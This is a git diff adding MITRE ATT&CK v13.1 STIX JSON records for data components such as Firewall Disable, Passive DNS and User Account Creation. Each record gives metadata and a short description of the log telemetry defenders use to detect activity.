b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--c97d0171-f6e0-4415-85ff-4082fdb8c72a.json new file mode 100644 index 0000000000000000000000000000000000000000..f355174182079e1028efa84ec15a61dde02cf244 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--c97d0171-f6e0-4415-85ff-4082fdb8c72a.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--0adc0958-ff0c-4467-b25c-e028ce85498e", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--c97d0171-f6e0-4415-85ff-4082fdb8c72a", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Firewall Disable", + "description": "Deactivation or stoppage of a cloud service (ex: Write/Delete entries within Azure Firewall Activity Logs)", + "x_mitre_data_source_ref": "x-mitre-data-source--f2f4f4bd-3455-400f-b2ee-104004df0f5b", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--cc150ad8-ecfa-4340-9aaa-d21165873bd4.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--cc150ad8-ecfa-4340-9aaa-d21165873bd4.json new file mode 100644 index 0000000000000000000000000000000000000000..abbca8ef3403a6fb36ca530ee9e75512bde9e6c4 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--cc150ad8-ecfa-4340-9aaa-d21165873bd4.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--add45184-530f-4aea-99db-9ee22ca41124", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--cc150ad8-ecfa-4340-9aaa-d21165873bd4", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.275Z", + "name": "Passive DNS", + "description": "Logged domain name system (DNS) data highlighting timelines of domain to IP address resolutions (ex: passive DNS)", + "x_mitre_data_source_ref": "x-mitre-data-source--dd75f457-8dc0-4a24-9ae5-4b61c33af866", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--d27b0089-2c39-4b6c-84ff-303e48657e77.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--d27b0089-2c39-4b6c-84ff-303e48657e77.json new file mode 100644 index 0000000000000000000000000000000000000000..b2f3ce8a30b680026b55ecc127814948ba04164e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--d27b0089-2c39-4b6c-84ff-303e48657e77.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--b73e05be-10c9-42be-8079-570a0f9869ee", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--d27b0089-2c39-4b6c-84ff-303e48657e77", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.271Z", + "name": "User Account Modification", + "description": "Changes made to an account, such as permissions and/or membership in specific groups (ex: Windows EID 4738 or /var/log access/authentication logs)", + "x_mitre_data_source_ref": "x-mitre-data-source--0b4f86ed-f4ab-46a3-8ed1-175be1974da6", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--d2ff4b56-8351-4ed8-b0fb-d8605366005f.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--d2ff4b56-8351-4ed8-b0fb-d8605366005f.json new file mode 100644 index 0000000000000000000000000000000000000000..a861350ae7c4a1a45d65fc99db83e17d6c8eb95a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--d2ff4b56-8351-4ed8-b0fb-d8605366005f.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--2aa51d8c-be3f-4a7b-85de-31052a3029f8", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--d2ff4b56-8351-4ed8-b0fb-d8605366005f", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Firewall Rule Modification", + "description": "Changes made to a firewall rule, typically to allow/block specific network traffic (ex: Windows EID 4950 or Write/Delete entries within Azure Firewall Rule Collection Activity Logs)", + "x_mitre_data_source_ref": "x-mitre-data-source--f2f4f4bd-3455-400f-b2ee-104004df0f5b", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--d46272ce-a0fe-4256-855e-738de7bb63ee.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--d46272ce-a0fe-4256-855e-738de7bb63ee.json new file mode 100644 index 0000000000000000000000000000000000000000..15c335c2a1e07415cdabcbff6ef688b5c519b39e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--d46272ce-a0fe-4256-855e-738de7bb63ee.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--1cc66108-76d2-4cdd-8b14-bf3d79669aa5", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--d46272ce-a0fe-4256-855e-738de7bb63ee", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.275Z", + "name": "Volume Modification", + "description": "Changes made to a cloud volume, including its settings and control data (ex: AWS modify-volume)", + "x_mitre_data_source_ref": "x-mitre-data-source--b0b6d26f-3747-4444-ac7a-239a6ff80cb5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--d5fca4e4-e47a-487b-873f-3d22f8865e96.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--d5fca4e4-e47a-487b-873f-3d22f8865e96.json new file mode 100644 index 0000000000000000000000000000000000000000..d3fb4bbb335261d1f4278e4c19454d7876d2ceae --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--d5fca4e4-e47a-487b-873f-3d22f8865e96.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--6555fe56-2f76-4c9b-b591-9be610e722c5", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--d5fca4e4-e47a-487b-873f-3d22f8865e96", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Process Modification", + "description": "Changes made to a process, or its contents, typically to write and/or execute code in the memory of the target process (ex: Sysmon EID 8)", + "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--d6257b8e-869c-41c0-8731-fdca40858a91.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--d6257b8e-869c-41c0-8731-fdca40858a91.json new file mode 100644 index 0000000000000000000000000000000000000000..227a42ce4e70685af87b6ea4770b749e4a39b070 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--d6257b8e-869c-41c0-8731-fdca40858a91.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--bae12924-033d-4f78-9ff7-bb9d751e4f0b", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--d6257b8e-869c-41c0-8731-fdca40858a91", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.271Z", + "name": "User Account Deletion", + "description": "Removal of an account (ex: Windows EID 4726 or /var/log access/authentication logs)", + "x_mitre_data_source_ref": "x-mitre-data-source--0b4f86ed-f4ab-46a3-8ed1-175be1974da6", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--da85d358-741a-410d-9433-20d6269a6170.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--da85d358-741a-410d-9433-20d6269a6170.json new file mode 100644 index 0000000000000000000000000000000000000000..e002d83d9d58a8353793d8224761a91dd54cd117 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--da85d358-741a-410d-9433-20d6269a6170.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--a6a3c3e0-f9bd-4e7a-9a28-2b9dafd752ec", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--da85d358-741a-410d-9433-20d6269a6170", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Windows Registry Key Modification", + "description": "Changes made to a Registry Key and/or Key value (ex: Windows EID 4657 or Sysmon EID 13|14)", + "x_mitre_data_source_ref": "x-mitre-data-source--0f42a24c-e035-4f93-a91c-5f7076bd8da0", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--deb22295-7e37-4a3b-ac6f-c86666fbe63d.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--deb22295-7e37-4a3b-ac6f-c86666fbe63d.json new file mode 100644 index 0000000000000000000000000000000000000000..9378afbeebd262c4752089d692560bbbd3557742 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--deb22295-7e37-4a3b-ac6f-c86666fbe63d.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--615cbd9c-e83e-4075-a0d2-17945a2adafb", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--deb22295-7e37-4a3b-ac6f-c86666fbe63d", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.271Z", + "name": "User Account Creation", + "description": "Initial construction of a new account (ex: Windows EID 4720 or /etc/passwd logs)", + "x_mitre_data_source_ref": "x-mitre-data-source--0b4f86ed-f4ab-46a3-8ed1-175be1974da6", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--f1eb6ea9-f3ab-414f-af35-2d5427199984.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--f1eb6ea9-f3ab-414f-af35-2d5427199984.json new file mode 100644 index 0000000000000000000000000000000000000000..dbef7cffc211a9444a5555d2bd55c90b6a2d71d6 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--f1eb6ea9-f3ab-414f-af35-2d5427199984.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--bb6e7410-9ca7-4146-903d-625571c569c5", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--f1eb6ea9-f3ab-414f-af35-2d5427199984", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Snapshot Modification", + "description": "Changes made to a snapshop, such as metadata and control data (ex: AWS modify-snapshot-attribute)", + "x_mitre_data_source_ref": "x-mitre-data-source--6d7de3b7-283d-48f9-909c-60d123d9d768", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--f42df6f0-6395-4f0c-9376-525a031f00c3.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--f42df6f0-6395-4f0c-9376-525a031f00c3.json new file mode 100644 index 0000000000000000000000000000000000000000..90cd41c561847d58f247aa119f66403c300c45f3 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--f42df6f0-6395-4f0c-9376-525a031f00c3.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--7a920082-2605-437e-a31c-3ceb42d4b682", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--f42df6f0-6395-4f0c-9376-525a031f00c3", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.271Z", + "name": "Scheduled Job Creation", + "description": "Initial construction of a new scheduled job (ex: Windows EID 4698 or /var/log cron logs)", + "x_mitre_data_source_ref": "x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--f5468e67-51c7-4756-9b4f-65707708e7fa.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--f5468e67-51c7-4756-9b4f-65707708e7fa.json new file mode 100644 index 0000000000000000000000000000000000000000..bf1edaaf7535494fcdd87496a15cf7af1be39cb1 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--f5468e67-51c7-4756-9b4f-65707708e7fa.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--d04548c1-09ae-4ebc-9c7e-caad76f36077", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--f5468e67-51c7-4756-9b4f-65707708e7fa", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.275Z", + "name": "Network Share Access", + "description": "Opening a network share, which makes the contents available to the requestor (ex: Windows EID 5140 or 5145)", + "x_mitre_data_source_ref": "x-mitre-data-source--ba27545a-9c32-47ea-ba6a-cce50f1b326e", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--f5a9a1dd-82f9-41a3-85b8-13e5b9cd6c79.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--f5a9a1dd-82f9-41a3-85b8-13e5b9cd6c79.json new file mode 100644 index 0000000000000000000000000000000000000000..6e32e9d0344d28d42da92f94a877c93dd2222f74 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--f5a9a1dd-82f9-41a3-85b8-13e5b9cd6c79.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--9080df8f-c6f9-49d6-9797-212d73209424", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--f5a9a1dd-82f9-41a3-85b8-13e5b9cd6c79", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Driver Metadata", + "description": "Contextual data about a driver and activity around it such as driver issues reporting or integrity (page hash, code) checking", + "x_mitre_data_source_ref": "x-mitre-data-source--9ec8c0d7-6137-456f-b829-c5f8b96ba054", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--f8213cde-6b3a-420d-9ab7-41c9af1a919f.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--f8213cde-6b3a-420d-9ab7-41c9af1a919f.json new file mode 100644 index 0000000000000000000000000000000000000000..066bfa6677fe6558b6b87b0d8c9f479f8d5e37a8 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--f8213cde-6b3a-420d-9ab7-41c9af1a919f.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--3ee03876-86a4-44b6-bf09-54328c67fa13", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--f8213cde-6b3a-420d-9ab7-41c9af1a919f", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Instance Start", + "description": "Activation or invocation of an instance (ex: instance.start within GCP Audit Logs)", + "x_mitre_data_source_ref": "x-mitre-data-source--45232bc0-e858-440d-aa93-d48c6cf167f0", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--faa34cf6-cf32-4dc9-bd6a-8f7a606ff65b.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--faa34cf6-cf32-4dc9-bd6a-8f7a606ff65b.json new file mode 100644 index 0000000000000000000000000000000000000000..84b7f5ffd097cd4271359142d184ee5019e2742a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--faa34cf6-cf32-4dc9-bd6a-8f7a606ff65b.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--fd081486-a35f-45a0-933a-9e1721976a06", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--faa34cf6-cf32-4dc9-bd6a-8f7a606ff65b", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.271Z", + "name": "Scheduled Job Modification", + "description": "Changes made to a scheduled job, such as modifications to the execution launch (ex: Windows EID 4702 or /var/log cron logs)", + "x_mitre_data_source_ref": "x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--fafaa705-ec08-4405-ac62-288c252e520d.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--fafaa705-ec08-4405-ac62-288c252e520d.json new file mode 100644 index 0000000000000000000000000000000000000000..6861c1a73243c5551ce83b422aaf41b30ce1cc10 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--fafaa705-ec08-4405-ac62-288c252e520d.json @@ -0,0 +1,25 @@ +{ + "type": "bundle", + "id": "bundle--90dad137-9bf7-439d-a4cc-b1c4675e1319", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-20T20:54:47.331Z", + "name": "Cluster Metadata", + "description": "Contextual data about a cluster and activity around it such as name, namespace, age, or status", + "x_mitre_data_source_ref": "x-mitre-data-source--c3af32ff-65c5-4ea8-912a-fb4a85197239", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--fafaa705-ec08-4405-ac62-288c252e520d", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--fcc4811f-9cc8-4db5-8097-4d8242a380de.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--fcc4811f-9cc8-4db5-8097-4d8242a380de.json new file mode 100644 index 0000000000000000000000000000000000000000..a9482c6c5c0a814d1a18a1c781c4a6425f782428 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--fcc4811f-9cc8-4db5-8097-4d8242a380de.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--18472ef8-a10a-4802-bd31-cac112f5aef1", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--fcc4811f-9cc8-4db5-8097-4d8242a380de", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Cloud Storage Enumeration", + "description": "An extracted list of cloud storage infrastructure (ex: AWS S3 ListBuckets or ListObjects)", + "x_mitre_data_source_ref": "x-mitre-data-source--2ce537a2-3b30-4374-9397-31d6460ec0bc", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--ff93f688-d7a4-49cf-9c79-a14454da8428.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--ff93f688-d7a4-49cf-9c79-a14454da8428.json new file mode 100644 index 0000000000000000000000000000000000000000..ef227bca6494a2f56e89ee87f8d0628007be5a44 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--ff93f688-d7a4-49cf-9c79-a14454da8428.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--31196771-ea20-465b-aaf0-4e410eec51d3", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--ff93f688-d7a4-49cf-9c79-a14454da8428", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.271Z", + "name": "Web Credential Usage", + "description": "An attempt by a user to gain access to a network or computing resource by providing web credentials (ex: Windows EID 1202)", + "x_mitre_data_source_ref": "x-mitre-data-source--1e26f222-e27e-4bfa-830c-fa4b4f18b5e4", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--ff9b665a-598b-4bcb-8b2a-a87566aa1256.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--ff9b665a-598b-4bcb-8b2a-a87566aa1256.json new file mode 100644 index 0000000000000000000000000000000000000000..a7d1b9f10340313f7764f0ce613f2da21a563c1b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--ff9b665a-598b-4bcb-8b2a-a87566aa1256.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--9c60168a-b074-4499-a603-453f977bc6fc", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--ff9b665a-598b-4bcb-8b2a-a87566aa1256", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.275Z", + "name": "Domain Registration", + "description": "Information about domain name assignments and other domain metadata (ex: WHOIS)", + "x_mitre_data_source_ref": "x-mitre-data-source--dd75f457-8dc0-4a24-9ae5-4b61c33af866", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--ffd73905-2e51-4f2d-8549-e72fb0eb6c38.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--ffd73905-2e51-4f2d-8549-e72fb0eb6c38.json new file mode 100644 index 0000000000000000000000000000000000000000..59440fa06f9abda50a9510b5499ae64c2e029587 --- /dev/null +++ 